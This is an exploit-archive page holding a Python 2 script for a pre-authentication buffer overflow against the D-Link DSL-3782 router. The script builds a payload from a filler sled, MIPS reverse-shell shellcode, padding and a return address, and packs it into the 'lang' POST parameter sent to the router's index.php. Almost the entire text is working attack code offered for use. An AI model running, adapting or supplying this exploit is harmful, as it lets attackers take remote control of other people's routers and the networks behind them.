Share
## https://sploitus.com/exploit?id=PACKETSTORM:165084
#!/usr/bin/python2  
# preauth rece for dlink dsl-3782  
# found: 06.11.2021  
# pwned: 18.112021 @ 19:26  
#   
  
  
import sys  
import urllib2 # requests  
import urllib  
import struct  
  
target = 'http://192.168.0.50/index.php' # cgi-bin/ChgLang.asp'  
  
  
  
  
nopsled = ""  
# NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)  
for i in range(74):  
nopsled += "\x41\x41\x41\x41" # 26\x40\x08\x01"  
  
  
#print("nopsled len: %s" % len(nopsled))  
#print(len(nopsled))  
  
  
# shellcode; revshell: 272-232=?:  
buf = b""  
buf += b"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x01\xc0\x20\x27\x01"  
buf += b"\xc0\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01"  
buf += b"\x01\x0c\x30\x50\xff\xff\x24\x0e\xff\xef\x01\xc0\x70"  
buf += b"\x27\x24\x0d\xff\xfd\x01\xa0\x68\x27\x01\xcd\x68\x04"  
buf += b"\x24\x0e\x27\x0f\x01\xae\x68\x25\xaf\xad\xff\xe0\xaf"  
buf += b"\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x02\x10"  
buf += b"\x20\x25\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff"  
buf += b"\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x02\x10\x20\x25"  
buf += b"\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x02"  
buf += b"\x10\x20\x25\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02"  
buf += b"\x10\x48\x01\x01\x01\x0c\xaf\xa2\xff\xff\x24\x11\xff"  
buf += b"\xfd\x02\x20\x88\x27\x8f\xa4\xff\xff\x02\x20\x28\x21"  
buf += b"\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff\x22"  
buf += b"\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff\x3c\x0f"  
buf += b"\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e"  
buf += b"\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4"  
buf += b"\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27"  
buf += b"\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c"  
  
  
shellcode = buf  
  
  
#shellcode = ( "D" * 276 )  
  
  
  
  
  
ret = struct.pack(">I", 0x7fff45b0) # ;] 0x7fff4528) # 0x2abccbb0) # system(); 0x2b269fcc) # SELECT... x2accefcc) # 0x123456) # 0x42424242)   
junk = "A" * 68 # 136 # 264 # (596 - len(shellcode) - len(ret)) # - len(nopsled))  
  
  
  
  
###############  
#payload = junk + shellcode + ret  
payload = nopsled + shellcode + junk + ret   
  
#print(len(payload))  
print(payload)  
  
data = urllib.urlencode({'lang' : payload })  
  
sendme = urllib2.Request(target, data ) # url=target, data=post_me)  
  
#print(sendme)  
  
#print "DONE"